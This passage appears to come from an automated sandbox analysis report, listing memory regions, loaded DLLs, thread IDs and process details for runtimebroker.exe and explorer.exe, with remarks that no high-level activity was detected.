| webcachev01.dat | 0x518db00000 | 0x518db0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db10000 | 0x518db1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db20000 | 0x518db2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db30000 | 0x518db3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db40000 | 0x518db4ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000518db50000 | 0x518db50000 | 0x518db5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518db60000 | 0x518db6ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db70000 | 0x518db7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db80000 | 0x518db8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518db90000 | 0x518db9ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000518dba0000 | 0x518dba0000 | 0x518dbaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518dbb0000 | 0x518dbbffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dbc0000 | 0x518dbcffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dbd0000 | 0x518dbdffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dbe0000 | 0x518dbeffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dbf0000 | 0x518dbfffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc00000 | 0x518dc0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc10000 | 0x518dc1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc20000 | 0x518dc2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc30000 | 0x518dc3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc40000 | 0x518dc4ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc50000 | 0x518dc5ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc60000 | 0x518dc6ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc70000 | 0x518dc7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc80000 | 0x518dc8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dc90000 | 0x518dc9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dca0000 | 0x518dcaffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dcb0000 | 0x518dcbffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dcc0000 | 0x518dccffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000518dcd0000 | 0x518dcd0000 | 0x518dcd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000518dce0000 | 0x518dce0000 | 0x518dddffff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518dde0000 | 0x518ddeffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518ddf0000 | 0x518ddfffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de00000 | 0x518de0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de10000 | 0x518de1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de20000 | 0x518de2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de30000 | 0x518de3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de40000 | 0x518de4ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de50000 | 0x518de5ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de60000 | 0x518de6ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de70000 | 0x518de7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de80000 | 0x518de8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518de90000 | 0x518de9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518deb0000 | 0x518debffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff7a0000 | 0x7df5ff7a0000 | 0x7ff5ff79ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff682326000 | 0x7ff682326000 | 0x7ff682327fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682328000 | 0x7ff682328000 | 0x7ff682329fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff68232c000 | 0x7ff68232c000 | 0x7ff68232dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff68232e000 | 0x7ff68232e000 | 0x7ff68232ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff682330000 | 0x7ff682330000 | 0x7ff68242ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff682430000 | 0x7ff682430000 | 0x7ff682452fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff682453000 | 0x7ff682453000 | 0x7ff682454fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682455000 | 0x7ff682455000 | 0x7ff682456fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682457000 | 0x7ff682457000 | 0x7ff682458fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682459000 | 0x7ff682459000 | 0x7ff68245afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff68245b000 | 0x7ff68245b000 | 0x7ff68245cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff68245d000 | 0x7ff68245d000 | 0x7ff68245efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff68245f000 | 0x7ff68245f000 | 0x7ff68245ffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 41 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #55: runtimebroker.exe
0
0
| Information | Value |
|---|---|
| ID | #55 |
| File Name | c:\windows\system32\runtimebroker.exe |
| Command Line | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x698 |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2B8
0x
474
0x
60C
0x
694
0x
7E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000005e8cc60000 | 0x5e8cc60000 | 0x5e8cc6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005e8cc70000 | 0x5e8cc70000 | 0x5e8cc70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8cc80000 | 0x5e8cc80000 | 0x5e8cc93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005e8cca0000 | 0x5e8cca0000 | 0x5e8cd1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8cd20000 | 0x5e8cd20000 | 0x5e8cd23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005e8cd30000 | 0x5e8cd30000 | 0x5e8cd31fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005e8cd40000 | 0x5e8cd40000 | 0x5e8cd41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8cdd0000 | 0x5e8cdd0000 | 0x5e8cdd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8cde0000 | 0x5e8cde0000 | 0x5e8cde0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005e8cdf0000 | 0x5e8cdf0000 | 0x5e8cdf6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8ce00000 | 0x5e8ce00000 | 0x5e8cefffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5e8cf00000 | 0x5e8cfbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005e8cfc0000 | 0x5e8cfc0000 | 0x5e8d03ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8d0c0000 | 0x5e8d0c0000 | 0x5e8d0c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005e8d0d0000 | 0x5e8d0d0000 | 0x5e8d0f9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005e8d100000 | 0x5e8d100000 | 0x5e8d106fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8d110000 | 0x5e8d110000 | 0x5e8d18ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8d190000 | 0x5e8d190000 | 0x5e8d192fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005e8d1a0000 | 0x5e8d1a0000 | 0x5e8d1a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8d1b0000 | 0x5e8d1b0000 | 0x5e8d1b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005e8d200000 | 0x5e8d200000 | 0x5e8d2fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005e8d300000 | 0x5e8d300000 | 0x5e8d487fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005e8d490000 | 0x5e8d490000 | 0x5e8d610fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005e8d620000 | 0x5e8d620000 | 0x5e8ea1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x5e8ea20000 | 0x5e8ed56fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005e8ee50000 | 0x5e8ee50000 | 0x5e8ee56fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8ef00000 | 0x5e8ef00000 | 0x5e8effffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8f080000 | 0x5e8f080000 | 0x5e8f17ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005e8f180000 | 0x5e8f180000 | 0x5e8f1fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffcb0000 | 0x7df5ffcb0000 | 0x7ff5ffcaffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff606f7a000 | 0x7ff606f7a000 | 0x7ff606f7bfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff606f80000 | 0x7ff606f80000 | 0x7ff60707ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff607080000 | 0x7ff607080000 | 0x7ff6070a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6070a5000 | 0x7ff6070a5000 | 0x7ff6070a6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6070a9000 | 0x7ff6070a9000 | 0x7ff6070aafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6070ab000 | 0x7ff6070ab000 | 0x7ff6070abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6070ae000 | 0x7ff6070ae000 | 0x7ff6070affff | Private Memory | rw |
|
|
|
- |
| runtimebroker.exe | 0x7ff607450000 | 0x7ff607465fff | Memory Mapped File | rwx |
|
|
|
- |
| ntoskrnl.exe | 0x7ff7a4d30000 | 0x7ff7a5581fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.internal.shell.broker.dll | 0x7ffae4250000 | 0x7ffae42e1fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffae8710000 | 0x7ffae8752fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.ui.immersive.dll | 0x7ffaed950000 | 0x7ffaedb06fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ffaeef30000 | 0x7ffaef03efff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ffaf0f60000 | 0x7ffaf0f77fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffaf1380000 | 0x7ffaf1395fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| sppc.dll | 0x7ffaf2a90000 | 0x7ffaf2ab4fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7ffaf2ac0000 | 0x7ffaf2ae5fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffaf4300000 | 0x7ffaf4397fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #56: explorer.exe
0
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x820 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
FDC
0x
BFC
0x
B24
0x
B18
0x
B08
0x
B0C
0x
AFC
0x
AF4
0x
AF0
0x
AEC
0x
AD8
0x
AD4
0x
AC4
0x
9F8
0x
9C4
0x
958
0x
944
0x
90C
0x
8FC
0x
8F8
0x
8F4
0x
8C8
0x
8B0
0x
8AC
0x
898
0x
890
0x
88C
0x
880
0x
87C
0x
878
0x
874
0x
870
0x
86C
0x
840
0x
83C
0x
824
0x
76C
0x
554
0x
F18
0x
F1C
0x
310
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000970000 | 0x00970000 | 0x0097ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000980000 | 0x00980000 | 0x00986fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000990000 | 0x00990000 | 0x009a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a30000 | 0x00a30000 | 0x00a33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x00a42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a66fff | Private Memory | rw |
|
|
|
- |
| explorer.exe.mui | 0x00a70000 | 0x00a77fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ba0000 | 0x00c5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00cf0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d20000 | 0x00d20000 | 0x00d20fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00d30000 | 0x00d33fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db | 0x00d40000 | 0x00d52fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00d60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x00f07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f10000 | 0x00f10000 | 0x01090fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000010a0000 | 0x010a0000 | 0x0249ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x024a0000 | 0x027d6fff | Memory Mapped File | r |
|
|
|
- |
| thumbcache_idx.db | 0x027f0000 | 0x027f1fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x02800000 | 0x02801fff | Memory Mapped File | rw |
|
|
|
- |
| iconcache_idx.db | 0x02810000 | 0x02811fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002820000 | 0x02820000 | 0x0288bfff | Private Memory | rw |
|
|
|
- |
| thumbcache_idx.db | 0x02890000 | 0x02891fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x028a0000 | 0x028a1fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x028b0000 | 0x028b1fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002960000 | 0x02960000 | 0x029dffff | Private Memory | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000033.db | 0x029e0000 | 0x029fcfff | Memory Mapped File | r |
|
|
|
- |
| shell32.dll.mui | 0x02a00000 | 0x02a60fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002a70000 | 0x02a70000 | 0x02a72fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002a80000 | 0x02a80000 | 0x02a82fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002a90000 | 0x02a90000 | 0x02ab9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02ac0000 | 0x02b9efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bd0000 | 0x02bd0000 | 0x02bd1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bf0000 | 0x02bf0000 | 0x02bf1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x02c20000 | 0x02c23fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002c30000 | 0x02c30000 | 0x02c32fff | Pagefile Backed Memory | r |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000034.db | 0x02c40000 | 0x02c5dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x02c62fff | Pagefile Backed Memory | r |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db | 0x02c70000 | 0x02c8bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002c90000 | 0x02c90000 | 0x02c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d20000 | 0x02d20000 | 0x02d21fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d30000 | 0x02d30000 | 0x02d31fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x02d40000 | 0x02d41fff | Memory Mapped File | r |
|
|
|
- |
| oleaccrc.dll.mui | 0x02d50000 | 0x02d54fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02e17fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002e20000 | 0x02e20000 | 0x02e23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x0302ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003030000 | 0x03030000 | 0x03030fff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03040000 | 0x0407ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004080000 | 0x04080000 | 0x04086fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x040a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040b0000 | 0x040b0000 | 0x040b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040c0000 | 0x040c0000 | 0x0413ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004140000 | 0x04140000 | 0x04141fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004150000 | 0x04150000 | 0x04150fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004160000 | 0x04160000 | 0x04160fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004170000 | 0x04170000 | 0x04170fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004180000 | 0x04180000 | 0x04182fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x04190000 | 0x04193fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000041a0000 | 0x041a0000 | 0x041a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000041b0000 | 0x041b0000 | 0x041b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000041d0000 | 0x041d0000 | 0x041d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000041e0000 | 0x041e0000 | 0x04218fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004220000 | 0x04220000 | 0x04222fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004230000 | 0x04230000 | 0x04230fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004240000 | 0x04240000 | 0x04240fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004250000 | 0x04250000 | 0x042cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x0434ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004350000 | 0x04350000 | 0x04352fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x04360000 | 0x04363fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0x04370000 | 0x043b2fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x043c0000 | 0x043c3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x043d0000 | 0x0445afff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x04460000 | 0x04470fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004480000 | 0x04480000 | 0x044fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x0457ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x04580fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x0460ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0470ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004710000 | 0x04710000 | 0x04c01fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c10fff | Private Memory | rw |
|
|
|
- |
| thumbcache_48.db | 0x04c20000 | 0x04d1ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
